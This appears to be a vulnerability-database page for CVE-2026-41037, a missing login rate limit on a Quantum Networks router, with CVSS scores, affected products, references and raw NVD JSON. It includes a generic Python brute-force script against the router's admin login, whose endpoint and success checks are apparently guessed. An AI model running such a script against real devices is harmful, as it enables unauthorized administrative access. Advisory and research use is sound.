CVE-2026-41037

Description

This vulnerability exists in Quantum Networks router due to missing rate limiting and CAPTCHA protection for failed login attempts in the web-based management interface. An attacker on the same network could exploit this vulnerability by performing brute force attacks against administrative credentials, leading to unauthorized access with root privileges on the targeted device.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:qntmnet:qn-i-470_firmware:6.1.1.b1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:qntmnet:qn-i-470:-:*:*:*:*:*:*:* - NOT VULNERABLE

Quantum Networks Router (未指定具体版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
# Replace with the actual IP of the vulnerable router
target_url = "http://192.168.1.1/admin/login.php"
username = "admin"
wordlist = ["admin", "password", "123456", "root", "admin123"]

def brute_force_attack():
    print(f"[*] Starting brute force attack on {target_url}")
    
    for password in wordlist:
        # Payload construction based on typical login forms
        payload = {
            "username": username,
            "password": password,
            "submit": "Login"
        }
        
        try:
            # Sending POST request to the management interface
            # No rate limiting means we can send requests immediately back-to-back
            response = requests.post(target_url, data=payload, timeout=3)
            
            # Analyzing response to determine success
            # Check for common success indicators (e.g., redirect to dashboard, welcome message)
            if "dashboard" in response.text.lower() or response.status_code == 302:
                print(f"[+] SUCCESS! Credentials found -> {username}:{password}")
                return True
            else:
                print(f"[-] Failed attempt: {password}")
                
        except requests.RequestException as e:
            print(f"[!] Connection error: {e}")
            break
            
    print("[-] Brute force completed. No valid credentials found in wordlist.")
    return False

if __name__ == "__main__":
    brute_force_attack()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41037
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41037
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41037/
[4] VulDB https://vuldb.com/cve/CVE-2026-41037
[5] https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0200

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41037", "sourceIdentifier": "[email protected]", "published": "2026-04-21T10:16:30.957", "lastModified": "2026-05-06T18:12:19.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability exists in Quantum Networks router due to missing rate limiting and CAPTCHA protection for failed login attempts in the web-based management interface. An attacker on the same network could exploit this vulnerability by performing brute force attacks against administrative credentials, leading to unauthorized access with root privileges on the targeted device."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qntmnet:qn-i-470_firmware:6.1.1.b1:*:*:*:*:*:*:*", "matchCriteriaId": "A9418B1D-1A2C-4134-BF4A-854F6942D3DE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qntmnet:qn-i-470:-:*:*:*:*:*:*:*", "matchCriteriaId": "695A22BB-D237-4EB0-B4F7-901C86E98625"}]}]}], "references": [{"url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0200", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}